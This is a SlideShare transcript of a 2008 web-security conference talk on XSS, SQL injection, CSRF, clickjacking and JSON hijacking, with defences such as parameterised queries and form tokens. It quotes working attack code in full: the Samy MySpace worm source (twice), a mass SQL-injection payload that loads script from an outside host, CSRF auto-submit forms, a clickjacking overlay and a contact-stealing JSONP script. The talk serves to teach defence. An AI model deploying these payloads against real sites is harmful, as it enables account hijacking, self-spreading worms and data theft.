SlideShare a Scribd company logo

Web Security Horror Stories

ā€¢
ā€¢
Simon Willison
Simon Willison

Keeping your web application secure is an ongoing process - new classes of vulnerabilities are discovered with surprising frequency, and if you don't keep on top of them you could be in for a nasty surprise. This talk will discuss both common and obscure vulnerabilities, with real-world examples of attacks that have worked against high profile sites in the past.

Technology
1 of 76
Download to read offline
Web Security Horror Stories The Dire ctorā€™s C ut Simon Willison, 26th October 2008
The edited version ā€¢ On Friday, I spent 15 minutes introducing: ā€¢ XSS ā€¢ CSRF / login CSRF ā€¢ SQL injection ā€¢ Clickjacking ā€¢ I promised this talk would provide ļ¬xes
XSS ā€¢ Cross-site scripting ā€¢ Attacker injects JavaScript code in to your site ā€¢ Amazingly common ā€¢ A single XSS hole on your domain compromises your security, entirely
Alex Russell: If you are subject to an XSS, the same domain policy already ensures that youā€™re fā€™d. An XSS attack is the ā€œrootā€ or ā€œring 0ā€ attack of the web. http://www.sitepen.com/blog/2007/01/07/when-vendors-attack-ļ¬lm-at-11/
The same origin policy ā€œThe same origin policy prevents a document or script loaded from one origin from getting or setting properties of a document from another origin. This policy dates all the way back to Netscape Navigator 2.0.ā€ https://developer.mozilla.org/en/Same_origin_policy_for_JavaScript
Why? ā€¢ Without the same origin policy, I could load your site in a frame, iframe or popup window from my site... ā€¢ ... and steal data from it ā€¢ ... or rewrite it with my own modiļ¬cations ā€¢ evil.hax.ru should not be able to read secret-wiki.bigco.intl ā€¢ XMLHttpRequest has the same policy
Things I can do if you have an XSS hole ā€¢ Steal your usersā€™ cookies and log in as them ā€¢ Show a fake phishing login page on your site ā€¢ Embed malware and drive-by downloads ā€¢ Perform any action as if I was your user
Two categories of XSS ā€¢ Reļ¬‚ected ā€¢ I embed my JS in a link to your site and trick your user in to following it ā€¢ Persistent ā€¢ I get my XSS in to your siteā€™s database somehow so that it shows up on your pages
http://www.facebook.com/srch.php?nm=xss%00<script>alert('XSS')</script> http://www.youtube.com/edit_playlist_info?p='%22%3E%3Cscript% 20src=http://ckers.org/s%3E http://groups.google.com/group/rec.sport.pro-wrestling/browse_thread/ thread/1ab38554971acfc9')&+eval (alert(document.cookie))&+eval('?tvc=2 http://search.live.com/images/results.aspx? q=1&ļ¬rst=21&FORM=PEIRquot;><script>alert('securitylab.ru')</script> All from http://xssed.com/
SQL injection
Inexcusable. Use paramaterised queries, or an ORM
If youā€™re gluing SQL strings together with string appends,
ā€¢ Wrong: ā€¢ $sql = quot;select * from users where username = 'quot; . $username . quot;'quot;; ā€¢ Right: ā€¢ $results = db_query(quot;select * from users where username = ?quot;, $username);
Mass XSS via SQL injection DECLARE @T varchar(255), @C varchar(255); DECLARE Table_Cursor CURSOR FOR SELECT a.name, b.name FROM sysobjects a, syscolumns b WHERE a.id = b.id AND a.xtype = 'u' AND (b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167); OPEN Table_Cursor; FETCH NEXT FROM Table_Cursor INTO @T, @C; WHILE (@@FETCH_STATUS = 0) BEGIN EXEC( 'update [' + @T + '] set [' + @C + '] = rtrim(convert(varchar,[' + @C + ']))+ ''<script src=http://evilsite.com/1.js></script>''' ); FETCH NEXT FROM Table_Cursor INTO @T, @C; END; CLOSE Table_Cursor; DEALLOCATE Table_Cursor; http://hackademix.net/2008/04/26/mass-attack-faq/
Preventing XSS ā€¢ Use a tool that escapes everything on output ā€¢ Only unescape stuff that you know is safe and you know contains markup you want to execute ā€¢ IE 8 has an XSS ļ¬lter; this is irrelevant to developers ā€¢ httpOnly cookies are mostly a waste of time
HTML ā€œsanitisationā€ ā€¢ My users need to be able to add links and basic styles to their submissions ā€¢ ā€œIā€™ll let them use HTML and remove anything nastyā€ ā€¢ An extremely common vector for XSS ā€¢ MySpace ā€¢ LiveJournal ā€¢ Almost anyone else who tries
<div id=mycode style=quot;BACKGROUND: url('java script:eval(document.all.mycode.expr)')quot; expr=quot;var B=String.fromCharCode(34);var A=String.fromCharCode (39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else {return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromURL (AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split ('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if(location.hostname=='profile.myspace.com') {document.location='http://www.myspace.com'+location.pathname+location.search}else{if(!M){getData(g())}main()} function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV) {var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1) {Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST') {J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content- Length',BK.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn (BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG +'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring (0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e) {Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace ('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn (AU,'P'+'rofileHeroes','</td>');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS ['interest']=AG;J=getXMLObj();httpSend('/index.cfm? fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if (J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS ['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter (AU,'hash');httpSend('/index.cfm? fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj ();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm? fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm() {if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm? fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2 (BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open (BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form- urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}quot;></DIV>
samy is my hero http://namb.la/popular/
A social network worm ā€¢ XSS hole in MySpaceā€™s HTML ļ¬lter ā€¢ When you viewed Samyā€™s proļ¬le... ā€¢ JS makes you add him as a friend ā€¢ JS uses XMLHttpRequest to add his exploit to YOUR proļ¬le as well
20 hours, 1,005,831 friend requests (then MySpace crashed)
<div id=mycode style=quot;BACKGROUND: url('java script:eval(document.all.mycode.expr)')quot; expr=quot;var B=String.fromCharCode(34);var A=String.fromCharCode (39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else {return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromURL (AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split ('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if(location.hostname=='profile.myspace.com') {document.location='http://www.myspace.com'+location.pathname+location.search}else{if(!M){getData(g())}main()} function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV) {var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1) {Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST') {J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content- Length',BK.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn (BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG +'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring (0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e) {Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace ('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn (AU,'P'+'rofileHeroes','</td>');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS ['interest']=AG;J=getXMLObj();httpSend('/index.cfm? fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if (J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS ['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter (AU,'hash');httpSend('/index.cfm? fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj ();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm? fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm() {if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm? fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2 (BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open (BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form- urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}quot;></DIV>
<div id=mycode style=quot;BACKGROUND: url('java script:eval(document.all.mycode.expr)')quot; expr=quot;...quot;> eval('document.body.inne' + 'rHTML'); eval('xmlhttp.onread' + 'ystatechange = callback'); http://namb.la/popular/tech.html
Things to remember ā€¢ Whitelist, donā€™t blacklist ā€¢ Youā€™re programming against undocumented parsing routines in closed-source browsers ā€¢ Distrust any library that doesnā€™t have a unit test suite a mile long ā€¢ http://ha.ckers.org/xss.html ā€¢ http://code.google.com/p/html5lib/ is promising
Googleā€™s UTF-7 hole
The UTF-7 hole ā€¢ Googleā€™s 404 pages used to be served without a character set speciļ¬ed in the HTTP headers or <head> section ā€¢ Without those hints, IE inspects the ļ¬rst 4096 bytes to ā€œguessā€ which encoding is used ā€¢ XSS attacks encoded as UTF-7 were shown on the page and executed by IE http://shiļ¬‚ett.org/blog/2005/dec/googles-xss-vulnerability
You canā€™t trust CSS either ā€¢ Want to let your users include their own stylesheet? ā€¢ HTC in IE and XBL in Mozilla are both vectors for JavaScript attacks ā€¢ LiveJournal were attacked with this ā€¢ A ā€œposition: absoluteā€ hack was used to steal 30,000 MySpace passwords last year http://community.livejournal.com/lj_dev/708069.html http://www.securiteam.com/securitynews/6O00M0AHFW.html
CSRF
Bill Zeller: ā€œWeā€™ve found CSRF vulnerabilities in sites that have a huge incentive to do security correctly. If youā€™re in charge of a website and havenā€™t speciļ¬cally protected against CSRF, chances are youā€™re vulnerableā€
The Google Web Accelerator
How does it work? ā€¢ It pre-fetches the links on a page in to a cache, so theyā€™re already loaded when you click on them ā€¢ Links like http://app.example.com/ delete.php?id=5
How does it work? ā€¢ It pre-fetches the links on a page in to a cache, so theyā€™re already loaded when you click on them ā€¢ Links like http://app.example.com/ delete.php?id=5
http://www.37signals.com/svn/archives2/google_web_accelerator_hey_not_so_fast_an_alert_for_web_app_designers.php
Thatā€™s also a security hole <img src=quot;http://app.example.com/delete.php?id=1quot;> <img src=quot;http://app.example.com/delete.php?id=2quot;> <img src=quot;http://app.example.com/delete.php?id=3quot;> <img src=quot;http://app.example.com/delete.php?id=4quot;> <img src=quot;http://app.example.com/delete.php?id=5quot;> <img src=quot;http://app.example.com/delete.php?id=6quot;> <img src=quot;http://app.example.com/delete.php?id=7quot;> <img src=quot;http://app.example.com/delete.php?id=8quot;> ...
So use POST ā€¢ You can't create a page that automatically posts to another site, can you?
POST will not save you <form action=quot;http://app.example.com/delete.phpquot; method=quot;POSTquot;> <input type=quot;hiddenquot; name=quot;idquot; value=quot;1quot;> <input type=quot;submitquot; value=quot;More kittens please!quot;> </form> fofurasfelinas: http://www.ļ¬‚ickr.com/photos/fofurasfelinas/9724483/
Or do it with JavaScript <div style=quot;display: nonequot;> <form action=quot;http://app.example.com/delete.phpquot; method=quot;POSTquot;> <input type=quot;hiddenquot; name=quot;idquot; value=quot;1quot;> </form> </div> <script>document.forms[0].submit()</script> Put this in a hidden iframe and your victim won't even know it happened.
The Digg exploit ā€¢ A few years ago, Digg had no CSRF protection on their ā€œdigg thisā€ button ā€¢ Self-digging pages! http://ha.ckers.org/blog/20060615/a-story-that-diggs-itself/
The Gmail ļ¬lter hack http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/
ā€œWe believe this is the ļ¬rst CSRF vulnerability to allow the transfer of funds from a ļ¬nancial institution.ā€ http://www.freedom-to-tinker.com/blog/wzeller/ popular-websites-vulnerable-cross-site-request- forgery-attacks
Preventing CSRF ā€¢ You need to distinguish between form interactions from your user on your site, and form interactions from your user on some other site ā€¢ Referrer checking is notoriously unreliable ā€¢ Solution: include a form token (Yahoo! calls this a ā€œcrumbā€) proving that the post came from your site
Crumbs <form action=quot;http://app.example.com/delete.phpquot; method=quot;POSTquot;> <input type=quot;hiddenquot; name=quot;idquot; value=quot;37quot;> <input type=quot;hiddenquot; name=quot;crumbquot; value=quot;856c2f50ddc49fd710f14a406ec1fef652d3c9fquot;> <input type=quot;submitquot; value=quot;Delete this itemquot;> </form>
Crumbs ā€¢ Should be unique per user (or one user can use their crumb to attack another) ā€¢ Hence should be tied to the userā€™s session or login cookie ā€¢ Should be changed over time ā€¢ Quick and dirty: use sha1(salt + userā€™s session ID + timestamp) as the crumb
Protecting the crumb ā€¢ Your crumb is now the only thing protecting you from CSRF attacks ā€¢ This is why XSS is ā€œring 0ā€ for the Web ā€¢ With XSS, I can steal your crumb and run riot across your site ā€¢ XSS holes are automatically CSRF holes
Crumbs and Ajax ā€¢ Ajax can set HTTP headers; regular forms canā€™t ā€¢ Ajax requests must be from the same domain ā€¢ So X-Requested-By: XMLHttpRequest can only come from your own site ā€¢ You can skip your crumb checking for requests that include that custom header
Login CSRF ā€¢ Most login forms skip CSRF protection ā€¢ Create a throw-away PayPal account ā€¢ Use CSRF to log someone in as ā€œyouā€ ā€¢ Hope that they add their credit card or bank details ā€¢ Log in later and steal all of their money!
Clickjacking http://jeremiahgrossman.blogspot.com/2008/09/cancelled-clickjacking-owasp-appsec.html
iframe !
<style type=quot;text/cssquot;> iframe { width: 400px; height: 200px; position: absolute; top: 10px; left: 10px; overflow: hidden; opacity: 0; } #decoy { ... } </style> <iframe src=quot;http://veryimportantapp.com/delete-account/quot;> </iframe> <p id=quot;decoyquot;>Click HERE for kittens!</p>
Frame-busting <script type=quot;text/javascriptquot;> if (top.location != location) { top.location.href = document.location.href; } </script> ā€¢ Ironically, turning off JavaScript in your browser makes you less safe here
Anti click-jacki ng
The problem with plugins
crossdomain.xml <cross-domain-policy> <allow-access-from domain=quot;*quot; /> </cross-domain-policy> Putting this at example.com/crossdomain.xml allows Flash applets on other sites to read your pages and steal your crumbs Flash can even fake an X-Requested-With: XMLHttpRequest header Thatā€™s why Flickr use api.ļ¬‚ickr.com/crossdomain.xml instead
crossdomain.xml <cross-domain-policy> <allow-access-from domain=quot;*quot; /> </cross-domain-policy> Putting this at example.com/crossdomain.xml allows Flash applets on other sites to read your pages and steal your crumbs Flash can even fake an X-Requested-With: XMLHttpRequest header Thatā€™s why Flickr use api.ļ¬‚ickr.com/crossdomain.xml instead
Nasty crossdomain.xml tricks loadPolicyFile(quot;http://dom.ext/exit.php?url=http://dom.ext/upl/Xdomain.xmlquot;) 00000000 47 49 46 38 39 61 01 01-01 01 e7 e9 20 3c 63 72 GIF89a.......<cr 00000010 6f 73 73 2d 64 6f 6d 61-69 6e 2d 70 6f 6c 69 63 oss-domain-polic 00000020 79 3e 0a 20 20 3c 61 6c-6c 6f 77 2d 61 63 63 65 y>...<allow-acce 00000030 73 73 2d 66 72 6f 6d 20-64 6f 6d 61 69 6e 3d 22 ss-from domain=quot; 00000040 2a 22 2f 3e 20 0a 20 20-3c 2f 63 72 6f 73 73 2d *quot;/>....</cross- 00000050 64 6f 6d 61 69 6e 2d 70-6f 6c 69 63 79 3e 47 49 domain-policy>.. http://www.hardened-php.net/library/ poking_new_holes_with_ļ¬‚ash_crossdomain_policy_ļ¬les.html
The PDF hole ā€¢ In January 2007, an XSS hole was found in the Adobe PDF reader itself ā€¢ It could execute JavaScript in the context of the current domain ā€¢ Any sites hosting .pdf ļ¬les for download were vulnerable http://shiļ¬‚ett.org/blog/2007/jan/adobe-pdf-xss-vulnerability
You canā€™t secure your site 100%, because thereā€™s always a chance a browser or plugin will screw things up for you
Insecure JSON
JSONP rocks! ā€¢ http://json-tinyurl.appspot.com/ ā€¢ http://json-time.appspot.com/ ā€¢ http://json-head.appspot.com/ http://json-tinyurl.appspot.com/?url=http://example.com/&callback=foo foo({quot;tinyurlquot;: quot;http://tinyurl.com/kotuquot;, quot;okquot;: true})
ā€¢ JSONP lets you opt-in to sharing your siteā€™s data with other sites using JavaScript ā€¢ ... so make sure itā€™s data you want to share
Stealing Google contacts <script> function google(a){ var emails; for(i=1;i<a.Body.Contacts.length;i){ alert(a.Body.Contacts[i].Email); } emails = quot;</ol>quot; document.write(emails); } </script> <script src=quot;http://docs.google.com/data/contacts? out=js&show=ALL&psort=Affinity&callback=google&max=99999quot;> </script> http://blog.adamjacobmuller.com/gmail.txt http://www.cyber-knowledge.net/blog/2007/01/01/gmail-vulnerable-to-contact-list-hijacking/
Jeremiah Grossman: ā€œIf any JSON feed containing user-sensitive information is wrapped with a call-back and has a predictable URL... then that data is at riskā€ http://jeremiahgrossman.blogspot.com/2007/01/gmail-xsrf-json-call-back-hackery.html
Regular JSON? ā€¢ Thatā€™s not secure either ā€¢ In old versions of Firefox, you can redeļ¬ne the Array constructor to grab the data ā€¢ If your JSON object is an array, the data can be grabbed using <script src=quot;your- data-herequot;> http://directwebremoting.org/blog/joe/2007/03/05/json_is_not_as_safe_as_people_think_it_is.html
Secure JSON Use { } as the root, not [ ] If youā€™re paranoid about future similar problems, use an idiom like this one: while (true) { {quot;jsonquot;: quot;goes herequot;} }
And if that wasnā€™t enough ā€œMore than 70% of people would reveal their computer password in exchange for a bar of chocolate, a survey has found.ā€ http://news.bbc.co.uk/1/hi/technology/3639679.stm ā€¢ We have a shared responsibility to teach people better online security behaviour ā€¢ Donā€™t teach our users to be phished!
NoScript?
Stay informed! ā€¢ http://planet-websecurity.org/feed/ ā€¢ http://www.owasp.org/ ā€¢ http://simonwillison.net/tags/security/ ā€¢ http://simonwillison.net/tags/csrf/ ā€¢ http://simonwillison.net/tags/xss/ ā€¢ http://simonwillison.net/tags/clickjacking/ ā€¢ http://simonwillison.net/tags/phishing/
Thank you

Recommended

XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesAbraham Aranguren
Ā 
Javać§ć‚„ć£ć¦ćæ悋 The Twelve Factor App JJUG-CCC 2014 Fall č¬›ę¼”č³‡ę–™
Javać§ć‚„ć£ć¦ćæ悋 The Twelve Factor App JJUG-CCC 2014 Fall č¬›ę¼”č³‡ę–™Javać§ć‚„ć£ć¦ćæ悋 The Twelve Factor App JJUG-CCC 2014 Fall č¬›ę¼”č³‡ę–™
Javać§ć‚„ć£ć¦ćæ悋 The Twelve Factor App JJUG-CCC 2014 Fall č¬›ę¼”č³‡ę–™Y Watanabe
Ā 
The OWASP Zed Attack Proxy
The OWASP Zed Attack ProxyThe OWASP Zed Attack Proxy
The OWASP Zed Attack ProxyAditya Gupta
Ā 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016bugcrowd
Ā 
Owasp zap
Owasp zapOwasp zap
Owasp zapColdFusionConference
Ā 
MongoDBꦂ要ļ¼šé‡‘čžę„­ē•Œć§ć®MongoDB
MongoDBꦂ要ļ¼šé‡‘čžę„­ē•Œć§ć®MongoDBMongoDBꦂ要ļ¼šé‡‘čžę„­ē•Œć§ć®MongoDB
MongoDBꦂ要ļ¼šé‡‘čžę„­ē•Œć§ć®MongoDBippei_suzuki
Ā 
Hack like a pro with burp suite - nullhyd
Hack like a pro with burp suite - nullhydHack like a pro with burp suite - nullhyd
Hack like a pro with burp suite - nullhydn|u - The Open Security Community
Ā 
Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Bernardo Damele A. G.
Ā 

Recommended

XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesAbraham Aranguren
Ā 
Javać§ć‚„ć£ć¦ćæ悋 The Twelve Factor App JJUG-CCC 2014 Fall č¬›ę¼”č³‡ę–™
Javać§ć‚„ć£ć¦ćæ悋 The Twelve Factor App JJUG-CCC 2014 Fall č¬›ę¼”č³‡ę–™Javać§ć‚„ć£ć¦ćæ悋 The Twelve Factor App JJUG-CCC 2014 Fall č¬›ę¼”č³‡ę–™
Javać§ć‚„ć£ć¦ćæ悋 The Twelve Factor App JJUG-CCC 2014 Fall č¬›ę¼”č³‡ę–™Y Watanabe
Ā 
The OWASP Zed Attack Proxy
The OWASP Zed Attack ProxyThe OWASP Zed Attack Proxy
The OWASP Zed Attack ProxyAditya Gupta
Ā 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016bugcrowd
Ā 
Owasp zap
Owasp zapOwasp zap
Owasp zapColdFusionConference
Ā 
MongoDBꦂ要ļ¼šé‡‘čžę„­ē•Œć§ć®MongoDB
MongoDBꦂ要ļ¼šé‡‘čžę„­ē•Œć§ć®MongoDBMongoDBꦂ要ļ¼šé‡‘čžę„­ē•Œć§ć®MongoDB
MongoDBꦂ要ļ¼šé‡‘čžę„­ē•Œć§ć®MongoDBippei_suzuki
Ā 
Hack like a pro with burp suite - nullhyd
Hack like a pro with burp suite - nullhydHack like a pro with burp suite - nullhyd
Hack like a pro with burp suite - nullhydn|u - The Open Security Community
Ā 
Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Bernardo Damele A. G.
Ā 
Web GĆ¼venlik AƧıkları ve Kullanımı (Geniş Anlatım)
Web GĆ¼venlik AƧıkları ve Kullanımı (Geniş Anlatım)Web GĆ¼venlik AƧıkları ve Kullanımı (Geniş Anlatım)
Web GĆ¼venlik AƧıkları ve Kullanımı (Geniş Anlatım)Mehmet KelepƧe
Ā 
Owasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionOwasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionMichael Hendrickx
Ā 
A Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications securityA Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications securityMikhail Egorov
Ā 
Web api
Web apiWeb api
Web apiSudhakar Sharma
Ā 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?Yurii Bilyk
Ā 
Smart Sheriff, Dumb Idea, the wild west of government assisted parenting
Smart Sheriff, Dumb Idea, the wild west of government assisted parentingSmart Sheriff, Dumb Idea, the wild west of government assisted parenting
Smart Sheriff, Dumb Idea, the wild west of government assisted parentingAbraham Aranguren
Ā 
ćØć«ć‹ćåˆ†ć‹ć‚Šć„ć‚‰ć„Twelve-Factor Appć®č§£čŖ¬ć‚’試ćæ悋
ćØć«ć‹ćåˆ†ć‹ć‚Šć„ć‚‰ć„Twelve-Factor Appć®č§£čŖ¬ć‚’試ćæ悋ćØć«ć‹ćåˆ†ć‹ć‚Šć„ć‚‰ć„Twelve-Factor Appć®č§£čŖ¬ć‚’試ćæ悋
ćØć«ć‹ćåˆ†ć‹ć‚Šć„ć‚‰ć„Twelve-Factor Appć®č§£čŖ¬ć‚’試ćæ悋Masatoshi Tada
Ā 
åŸŗē¤Žć‹ć‚‰č¦‹ē›“恙 ASP.NET MVC ć®å˜ä½“ćƒ†ć‚¹ćƒˆč‡Ŗå‹•åŒ–ę–¹ę³• ļ½ž Windows Azure é–¢é€£ć‚‚ć‚ć‚‹ć‹ć‚‚ļ½ž
åŸŗē¤Žć‹ć‚‰č¦‹ē›“恙 ASP.NET MVC ć®å˜ä½“ćƒ†ć‚¹ćƒˆč‡Ŗå‹•åŒ–ę–¹ę³• ļ½ž Windows Azure é–¢é€£ć‚‚ć‚ć‚‹ć‹ć‚‚ļ½žåŸŗē¤Žć‹ć‚‰č¦‹ē›“恙 ASP.NET MVC ć®å˜ä½“ćƒ†ć‚¹ćƒˆč‡Ŗå‹•åŒ–ę–¹ę³• ļ½ž Windows Azure é–¢é€£ć‚‚ć‚ć‚‹ć‹ć‚‚ļ½ž
åŸŗē¤Žć‹ć‚‰č¦‹ē›“恙 ASP.NET MVC ć®å˜ä½“ćƒ†ć‚¹ćƒˆč‡Ŗå‹•åŒ–ę–¹ę³• ļ½ž Windows Azure é–¢é€£ć‚‚ć‚ć‚‹ć‹ć‚‚ļ½žnormalian
Ā 
Hackfest presentation.pptx
Hackfest presentation.pptxHackfest presentation.pptx
Hackfest presentation.pptxPeter Yaworski
Ā 
Event Driven Microservices with Spring Cloud Stream #jjug_ccc #ccc_ab3
Event Driven Microservices with Spring Cloud Stream #jjug_ccc #ccc_ab3Event Driven Microservices with Spring Cloud Stream #jjug_ccc #ccc_ab3
Event Driven Microservices with Spring Cloud Stream #jjug_ccc #ccc_ab3Toshiaki Maki
Ā 
Security Exploit of Business Logic Flaws, Business Logic Attacks
Security Exploit of Business Logic Flaws, Business Logic AttacksSecurity Exploit of Business Logic Flaws, Business Logic Attacks
Security Exploit of Business Logic Flaws, Business Logic AttacksMarco Morana
Ā 
Secure Code Review 101
Secure Code Review 101Secure Code Review 101
